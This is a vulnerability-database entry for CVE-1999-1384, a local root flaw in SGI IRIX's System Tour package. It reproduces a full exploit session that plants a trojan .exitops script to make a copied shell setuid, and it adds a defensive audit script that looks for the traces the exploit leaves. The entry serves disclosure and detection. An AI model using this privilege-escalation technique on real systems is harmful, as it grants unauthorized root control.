IRIX SGI system tour package (systour) Indigo Magic System Tour permissions and access control vulnerability

Vulnerability ID: 1105265
Vulnerability type: Unknown
Published: 1996-10-30
Updated: 2005-05-02
CVE ID: CVE-1999-1384
CNNVD-ID: CNNVD-199610-009
Affected platform: IRIX
CVSS score: 7.2
|Vulnerability source
https://www.exploit-db.com/exploits/19356
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199610-009
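|Vulnerability details
The Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3 contains a vulnerability. Local users can gain root privileges by means of a Trojan horse .exitops program, which is run by the inst command that the RemoveSystemTour program executes.
|Exploit (EXP)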
source: http://www.securityfocus.com/bid/470/info

A vulnerability exists in both the Systour and OutOfBox subsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root.

$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution.
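
A defender-side audit for the artifacts the session above leaves behind, as an added example that is not part of the original advisory or exploit: it reports whether RemoveSystemTour carries the setuid bit, lists var/inst/.exitops files and "dryrun: true" .swmgrrc files under a home-directory root, and lists setuid files in a temporary directory. The function names, the script name audit.sh and the default home root /usr/people are assumptions; the script is written for a POSIX sh with a find that supports -path.

```shell
#!/bin/sh
# Added audit example (not from the original page). Every path is a
# parameter so the checks can run against any directory tree.

# True if FILE is a regular file carrying the setuid bit.
has_setuid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# .exitops files in a var/inst directory below HOME_ROOT: the location
# the session above fills in through $rbase.
find_exitops() {
    find "$1" -type f -path '*/var/inst/.exitops'
}

# .swmgrrc files that force "dryrun: true", as the session does.
find_dryrun_rc() {
    find "$1" -type f -name .swmgrrc | while IFS= read -r rc; do
        if grep -q '^dryrun:[[:space:]]*true' "$rc"; then
            printf '%s\n' "$rc"
        fi
    done
}

# Setuid regular files under DIR, such as the shell copy in /tmp.
find_setuid_files() {
    find "$1" -type f -perm -4000
}

# Print one line per finding. Defaults: the program path shown on the
# page; /usr/people as home root is an assumption about the host.
audit() {
    tour=${1:-/usr/lib/tour/bin/RemoveSystemTour}
    homes=${2:-/usr/people}
    tmp=${3:-/tmp}
    if has_setuid "$tour"; then echo "setuid program: $tour"; fi
    find_exitops "$homes"    | sed 's/^/planted .exitops: /'
    find_dryrun_rc "$homes"  | sed 's/^/dryrun override: /'
    find_setuid_files "$tmp" | sed 's/^/setuid file: /'
}

# Run as: sh audit.sh audit [program] [home_root] [tmp_dir]
if [ "${1:-}" = "audit" ]; then
    shift
    audit "$@"
fi
```

A "setuid program" line for RemoveSystemTour means the precondition is still present on the host; the other three lines indicate that the steps in the session may already have been carried out.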
|References

Source: USGovernmentResource:AA-96.08
Name: AA-96.08
Link: ftp://ftp.auscert.org.au/pub/auscert/advisory/AA-96.08.SGI.systour.vul
Source: BID
Name: 470
Link: http://www.securityfocus.com/bid/470
Source: BUGTRAQ
Name: 19961030 (Another) vulnerability in new SGIs
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=87602167420095&w=2
Source: SGI
Name: 19961101-01-I
Link: ftp://patches.sgi.com/support/free/security/advisories/19961101-01-I
Source: XF
Name: irix-systour(7456)
Link: http://www.iss.net/security_center/static/7456.php